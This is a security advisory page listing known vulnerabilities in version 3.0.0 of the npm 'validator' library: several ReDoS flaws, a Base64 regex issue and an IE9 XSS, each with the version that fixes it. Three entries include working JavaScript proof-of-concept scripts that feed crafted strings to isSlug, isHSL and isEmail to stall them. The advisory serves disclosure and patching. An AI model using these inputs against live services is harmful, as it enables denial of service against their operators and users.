validator 3.0.0 vulnerabilities

Known vulnerabilities in the validator package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isSlug` function PoC `var validator = require("validator") function build_attack(n) { var ret = "111" for (var i = 0; i < n; i++) { ret += "a" } return ret+"_"; } for(var i = 1; i <= 50000; i++) { if (i % 10000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isSlug(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isHSL` function. PoC `var validator = require("validator") function build_attack(n) { var ret = "hsla(0" for (var i = 0; i < n; i++) { ret += " " } return ret+"◎"; } for(var i = 1; i <= 50000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isHSL(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isEmail` function. PoC `var validator = require("validator") function build_attack(n) { var ret = "" for (var i = 0; i < n; i++) { ret += "<" } return ret+""; } for(var i = 1; i <= 50000; i++) { if (i % 10000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isEmail(attack_str,{ allow_display_name: true }) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Buffer Overflow `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Buffer Overflow. It used a regular expression (`/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==\|[A-Z0-9+\/]{3}=\|[A-Z0-9+\/]{4})$/i`) in order to validate Base64 strings. How to fix Buffer Overflow? Upgrade `validator` to version 5.0.0 or higher.	<5.0.0
M Cross-site Scripting (XSS) `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in IE9 due to unescaped backticks. How to fix Cross-site Scripting (XSS)? Upgrade `validator` to version 3.35.0 or higher.	>=3.0.0 <3.34.0
H Regular Expression Denial of Service (ReDoS) `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression in order to validate URLs. How to fix Regular Expression Denial of Service (ReDoS)? Update to version 3.22.1 or greater.	>=0.1.0 <3.22.1

Vulnerability

Vulnerable Version

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isSlug function

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = "111"
    for (var i = 0; i < n; i++) {
        ret += "a"
    }

    return ret+"_";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isSlug(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isHSL function.

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = "hsla(0"
    for (var i = 0; i < n; i++) {
        ret += " "
    }

    return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isHSL(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isEmail function.

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = ""
    for (var i = 0; i < n; i++) {
        ret += "<"
    }

    return ret+"";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        validator.isEmail(attack_str,{ allow_display_name: true })
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Buffer Overflow

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Buffer Overflow. It used a regular expression (/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==|[A-Z0-9+\/]{3}=|[A-Z0-9+\/]{4})$/i) in order to validate Base64 strings.

How to fix Buffer Overflow?

Upgrade validator to version 5.0.0 or higher.

<5.0.0

Cross-site Scripting (XSS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in IE9 due to unescaped backticks.

How to fix Cross-site Scripting (XSS)?

Upgrade validator to version 3.35.0 or higher.

>=3.0.0 <3.34.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression in order to validate URLs.

How to fix Regular Expression Denial of Service (ReDoS)?

Update to version 3.22.1 or greater.

>=0.1.0 <3.22.1

validator@3.0.0 vulnerabilities

String validation and sanitization

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

How to fix?

PoC

PoC

PoC